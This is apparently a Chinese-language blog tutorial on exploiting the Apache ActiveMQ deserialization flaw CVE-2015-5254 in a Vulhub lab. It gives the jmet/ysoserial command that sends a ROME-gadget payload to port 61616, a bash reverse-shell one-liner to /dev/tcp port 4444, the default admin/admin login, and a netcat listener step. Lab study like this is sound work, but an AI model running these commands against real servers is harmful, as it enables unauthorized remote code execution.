Vulhub靶机 ActiveMQ 反序列化漏洞(CVE-2015-5254)(渗透测试详解)

一、开启vulhub环境

复制代码
docker-compose up -d  启动
docker ps 查看开放的端口

漏洞版本:Apache ActiveMQ 5.x ~ Apache ActiveMQ 5.13.0

二、访问靶机IP 8161端口

默认账户密码 admin/admin,登录

此时qucues事件为空

1、使用jmet-0.1.0-all.jar工具将有效负载发送到目标IP的61616端口

jmet原理是使用ysoserial生成Payload并发送(其jar内自带ysoserial,无需再自己下载),所以我们需要在ysoserial是gadget中选择一个可以使用的,比如ROME。

复制代码
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,反弹shell
命令(base64加密)}|{base64,-d}|{bash,-i}" -Yp ROME 目标IP 61616

反弹shell命令:echo "bash -i>& /dev/tcp/x.x.x.x/4444 0>&1"> /tmp/shell.sh && bash /tmp/shell.sh

出现此情况,是Java版本过高,根据以下链接更换Java版本

复制代码
https://blog.csdn.net/weixin_46686336/article/details/140635571

切换完成后重新执行命令

出现以上情况就是执行成功

2、返回web页面,刷新

此时就多了一个事件,证明shell已经成功写入

3、攻击机开启nc监听

三、点击事件,成功反弹

至此,成功拿下系统权限。

下期再见,家人们!

相关推荐
禅与Bug的修复艺术4 分钟前
JAVA后端开发常用的LINUX命令总结
java·linux·面试·java面试·后端开发·java后端·面试经验
小吃饱了1 小时前
LSA六种类型
网络·智能路由器
北冥有鱼被烹1 小时前
【微知】/proc中如何查看Linux内核是否允许加载内核模块?(/proc/sys/kernel/modules_disabled)
linux·服务器
游王子1 小时前
springboot3 声明式 HTTP 接口
网络·spring boot·网络协议·http
qq_273900232 小时前
CentOS系统防火墙服务介绍
linux·运维·centos
小余吃大鱼2 小时前
CentOS中在线安装Docker(超详细)
linux·docker·centos
程序员JerrySUN2 小时前
驱动开发硬核特训 · Day 19:字符设备驱动实战(控制 LED)
linux·驱动开发
小灰灰__2 小时前
Linux安装ffmpeg7.1操作说明
linux·运维·服务器
神经毒素2 小时前
WEB安全--RCE--webshell bypass
网络·安全·web安全
猿周LV2 小时前
网络原理 - 应用层, 传输层(UDP 和 TCP) 进阶, 网络层, 数据链路层 [Java EE]
服务器·网络·网络协议·tcp/ip·udp·java-ee